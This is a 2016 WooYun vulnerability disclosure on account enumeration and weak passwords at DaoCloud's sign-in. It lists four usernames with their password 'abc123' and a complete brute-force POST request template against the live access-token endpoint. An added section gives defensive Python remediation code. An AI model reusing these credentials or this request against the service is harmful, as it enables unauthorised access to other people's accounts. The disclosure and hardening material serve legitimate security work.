
DaoCloud: registered accounts can be enumerated in bulk / weak passwords can be cracked / account credentials attached

2016-06-28 19:55

At the DaoCloud sign-in page, already registered users can be enumerated in bulk.

Code area:
https://account.daocloud.io/signin



Accounts

Code area:
Account: just, password: abc123
Account: kane, password: abc123
Account: novice, password: abc123
Account: snoopy, password: abc123



Since only a small and uncommon set of password rules was used, only these accounts were found.

Proof of vulnerability:

Submission endpoint:

Code area:
POST /access-token HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Referer: https://account.daocloud.io/signin
Accept-Language: zh-CN
Origin: https://account.daocloud.io
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Host: api.daocloud.io
Content-Length: 51
Connection: close
Cache-Control: no-cache

{"email_or_mobile":"§Wooyun§","password":"abc123"}



No. 1: Enumerating registered users at the sign-in page

Screenshots: QQ截图20160626200150.png, QQ截图20160626200308.png, QQ截图20160626200317.png



No. 2: Accounts successfully enumerated

Screenshot: QQ截图20160626200413.png



No. 3: Pages seen after successfully logging in as one of the users

Screenshots: QQ截图20160626200435.png, QQ截图20160626200511.png, QQ截图20160626200516.png, QQ截图20160626200523.png, QQ截图20160626200537.png, QQ截图20160626200609.png



Remediation:
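The remediation section of the report is empty. The following Python example is added here and is not part of the original report or of DaoCloud's code. It shows the two properties a login endpoint needs to close this class of issue: the "before" handler returns different errors for an unknown account and for a wrong password, which is exactly what lets the sign-in endpoint be used to enumerate users, while the "after" handler returns one generic error, performs the same hashing work whether or not the account exists, and throttles repeated failures per source IP and per target account. The user store, passwords, IP addresses and constants are constructed placeholders.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

PBKDF2_ROUNDS = 50_000  # illustrative value; production deployments use more


def _hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 of the password under the given salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def _make_user(password: str) -> tuple:
    """Build a (salt, hash) record for a constructed sample user."""
    salt = os.urandom(16)
    return salt, _hash_password(password, salt)


# Constructed sample user store (placeholder data, not DaoCloud's).
USERS = {"alice": _make_user("correct horse battery staple")}

# Dummy credential verified whenever the account does not exist, so the
# server does the same amount of work (and takes the same time) either way.
_DUMMY_SALT, _DUMMY_HASH = _make_user("unused-dummy-password")


def vulnerable_login(email_or_mobile: str, password: str) -> dict:
    """Before: the error text tells the client whether the account exists."""
    record = USERS.get(email_or_mobile)
    if record is None:
        return {"ok": False, "error": "user does not exist"}
    salt, stored = record
    if not hmac.compare_digest(_hash_password(password, salt), stored):
        return {"ok": False, "error": "wrong password"}
    return {"ok": True}


GENERIC_ERROR = {"ok": False, "error": "invalid credentials"}
THROTTLED = {"ok": False, "error": "too many attempts, try again later"}
MAX_FAILURES = 5      # failures tolerated per key inside the window
WINDOW_SECONDS = 600  # sliding window for counting failures


class HardenedLogin:
    """After: one error for unknown user and wrong password, uniform hashing
    work, and a failure counter per source IP and per target account."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock                 # injectable for deterministic tests
        self._failures = defaultdict(list)  # key -> timestamps of recent failures

    def _recent_failures(self, key) -> int:
        now = self._clock()
        recent = [t for t in self._failures[key] if now - t < WINDOW_SECONDS]
        self._failures[key] = recent
        return len(recent)

    def login(self, email_or_mobile: str, password: str, client_ip: str) -> dict:
        keys = (("ip", client_ip), ("acct", email_or_mobile))
        if any(self._recent_failures(k) >= MAX_FAILURES for k in keys):
            return dict(THROTTLED)
        record = USERS.get(email_or_mobile)
        # Always verify against some hash so a missing account costs the same.
        salt, stored = record if record is not None else (_DUMMY_SALT, _DUMMY_HASH)
        matched = hmac.compare_digest(_hash_password(password, salt), stored)
        if record is None or not matched:
            now = self._clock()
            for k in keys:
                self._failures[k].append(now)
            return dict(GENERIC_ERROR)  # same body for both failure causes
        return {"ok": True}


if __name__ == "__main__":
    print(vulnerable_login("nobody", "abc123"), vulnerable_login("alice", "abc123"))
    h = HardenedLogin()
    print(h.login("nobody", "abc123", "203.0.113.5"), h.login("alice", "abc123", "203.0.113.5"))
```

The generic error and the dummy verification remove the existence signal; the per-IP and per-account counters make the bulk request pattern shown in the report fail after a handful of attempts, and each throttle event is a natural point to emit an alert. The second finding, accounts protected by a password as common as abc123, is addressed separately by rejecting passwords from a common-password list at registration and password change.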

Source: www.wooyun.org/bugs/wooyun-2016-0223453
